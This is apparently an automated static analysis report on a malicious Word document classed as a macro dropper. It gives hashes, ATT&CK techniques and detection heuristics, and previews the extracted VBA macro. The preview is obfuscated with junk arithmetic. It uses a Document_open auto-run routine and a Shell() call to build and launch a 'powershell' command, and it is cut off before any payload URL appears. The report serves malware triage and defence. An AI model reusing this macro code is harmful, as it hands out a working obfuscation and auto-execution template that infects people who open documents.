Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 a9e46fe6f26eee23…

MALICIOUS

Office (OLE)

107.5 KB Created: 2018-06-18 13:24:00 Authoring application: Microsoft Office Word First seen: 2019-05-31
MD5: 915e693de6a9bfd5997484c5c5e77654 SHA-1: 0b82f9f55c7eb2b6f916134900ec4def45ef2ee5 SHA-256: a9e46fe6f26eee23427740e1cb3aefee7cf9621684edaedb966d394725332b2f
222 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro utilizes the Shell() function, a common technique for executing arbitrary commands. This suggests the document's primary purpose is to act as a dropper, initiating the download and execution of a secondary malicious payload. The ClamAV detection name further supports its classification as a dropper.

Heuristics 6

  • ClamAV: Doc.Dropper.Agent-6585393-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6585393-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 16578 bytes
SHA-256: b499d34228470eb01bcd4937d6924d1fbfc8236512a9fc49e18616b2a1916419
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "PwSWcOGrO"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function WtjXUV()
On Error Resume Next
qzDdA = MuYLXi * CSng(25527 * Fix(22423)) * YMiBrD + CSng(QEHCz + CLng(LndZOO)) / (ckWhk * CSng(21833) - (61982 + Fix(uIbzQc) - (77879 + CLng(IPVNbj - Log(Vzqljk) - 65868 + Int(PwzFnq)))))
QjWYVw = Atn(FjzWpU + Sin(sBkvl) - 1523 / 68900)
cKNKn = 33867 + 25152
AHLzp = DKCpsK
azFMKL = 97449 / 32915
pNXFZ = JlUGP * CSng(54094 * Fix(42153)) * JKDKjl + CSng(LrjokK + CLng(VoABOw)) / (wcjQl * CSng(1885) - (33471 + Fix(luJqN) - (8901 + CLng(TnjYSi - Log(nRpHL) - 30741 + Int(FOOWQK)))))
TuukRr = Atn(piuzt + Sin(VNSqjn) - 54552 / 78703)
MvNpWz = 30349 + 17578
Twtwzt = nAnQzn
bdpBo = 62237 / 60871
itBSQu = CZJia * CSng(554 * Fix(99828)) * VUdCfA + CSng(rijTX + CLng(dojXcT)) / (DwaXt * CSng(70579) - (70029 + Fix(nEUKRf) - (79583 + CLng(SVLcW - Log(WlzWo) - 47524 + Int(aLzjoq)))))
tGIuP = Atn(DaMJG + Sin(oRQBRq) - 78775 / 3413)
KRZKrw = 46214 + 82083
ddoSd = NQMCw
oZWwLG = 24511 / 86933
pzovFj = wENrhp * CSng(61307 * Fix(55252)) * WnDoA + CSng(mDfOlF + CLng(bnCjq)) / (dAXYjb * CSng(36051) - (16861 + Fix(GOkInj) - (27271 + CLng(GUfLMk - Log(qujsc) - 50759 + Int(zwswHw)))))
XNiVw = Atn(QidRWN + Sin(vOLbR) - 29419 / 14932)
ZoQrkT = 20216 + 18125
pbPRj = zqOow
luajOS = 33224 / 74001
WtjXUV = KpcwdUo + Chr$(Psvvz + 80 + OaANMKviZbW) + "OwerSH" + WoUzw + uNaZPIOiW + oNPfGjBsa + RZQTa
Qhsqjl = Hpkiz * CSng(83960 * Fix(26361)) * uzqMHO + CSng(DbIWVj + CLng(QuYiz)) / (HiYkzo * CSng(79482) - (3520 + Fix(JzUDlb) - (33723 + CLng(hbYfiR - Log(KQmEYp) - 11258 + Int(rNVLZ)))))
OSYjZ = Atn(JBSvb + Sin(RrHbUc) - 33652 / 81994)
QOWPT = 87171 + 66696
pQPsXS = zwFzY
jCkdo = 6854 / 66305
tsuij = PoFkOb * CSng(48403 * Fix(55771)) * LGuZwb + CSng(XRSQh + CLng(HEQpY)) / (vXVJq * CSng(69248) - (86881 + Fix(qUlzj) - (41768 + CLng(RSdoL - Log(VUcQQA) - 7229 + Int(BUYCNh)))))
qzDpF = Atn(hCjUj + Sin(zqmmA) - 26467 / 44124)
wqcZX = 27091 + 18454
MvWoE = VawFYn
Cttajp = 59916 / 79624
End Function
Function HsYodirGp(LLjYS)
On Error Resume Next
XoqHEw = dFPls * CSng(3716 * Fix(38797)) * JYvPR + CSng(CHwmk + CLng(zqvlpa)) / (oGjjA * CSng(58747) - (33513 + Fix(tpnvQb) - (41669 + CLng(PIazUV - Log(sVTzFm) - 19188 + Int(vRifTd)))))
ukzPIR = Atn(qUVcQ + Sin(cOczSa) - 77298 / 21764)
vvjnD = 80550 + 28730
CwYOqw = MOhiw
fLKjLr = 57193 / 65343
pjNFnF = GSNmZ * CSng(49496 * Fix(37790)) * OYivG + CSng(GjiBi + CLng(FKKozj)) / (HsAlK * CSng(97852) - (75439 + Fix(ORLDD) - (4682 + CLng(mJKnG - Log(iziDFQ) - 39508 + Int(IYnqQM)))))
NmUwS = Atn(sPWzi + Sin(iXAdMd) - 54462 / 48067)
dWiBhp = 66443 + 24082
NnqHZ = qqndq
WhEhSM = 11927 / 86661
KIKXbQAbv = wibPQD + Shell(GNPpiorTQYY + LLjYS + CvjFF, 11166 - 11166)
NnnWrF = OArlW * CSng(96701 * Fix(68907)) * vbwinV + CSng(wiIOad + CLng(jnwwz)) / (zDkhQ * CSng(50952) - (54095 + Fix(mENJWk) - (67518 + CLng(acGFX - Log(ENdimL) - 37152 + Int(nXAjr)))))
rQNNtB = Atn(iuEEt + Sin(WMVrs) - 55993 / 20019)
HGbilY = 14378 + 89383
InsqTJ = tLVda
WElnQU = 66682 / 33464
End Function
Private Sub Document_open()
On Error Resume Next
IFjuUM = ZchdME * CSng(92172 * Fix(32746)) * dDDGz + CSng(HjXDfL + CLng(ZXrAKz)) / (MwwzmU * CSng(67652) - (77287 + Fix(NOcJs) - (26534 + CLng(oKicwA - Log(RjRiD) - 19548 + Int(Muvjoh)))))
FTdwT = Atn(JpDBBL + Sin(DpcXiM) - 50762 / 64427)
Yatrw = 83033 + 33424
ZEjoiq = ffTMc
VqfiO = 2691 / 38160
cGXpw = RpRIVW * CSng(53057 * Fix(93982)) * pUwXrD + CSng(OFmFNo + CLng(jiBHZc)) / (RtsROq * CSng(4941) - (6719 + Fix(HofMr) - (25833 + CLng(uhzjs - Log(CsZcr) - 70262 + Int(TOCUEX)))))
GFcMpK = Atn(fRhbGT + Sin(Gabsh) - 72 / 82722)
PcrjiX = 35281 + 47470
HTlSp = kuhSW
slwSZm = 86297 / 72170
Application.Run WhiOkKj + "HsYodirGp" + LWzrlmNmFu, tfUSE + WtjXUV + rcWtRM
XXkGNq = XlLmj * CSng(42004 * Fix(37636)) * hnRWqw + CSng(hUZAk + CLng(AAZFK)) / (kwBLbN
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.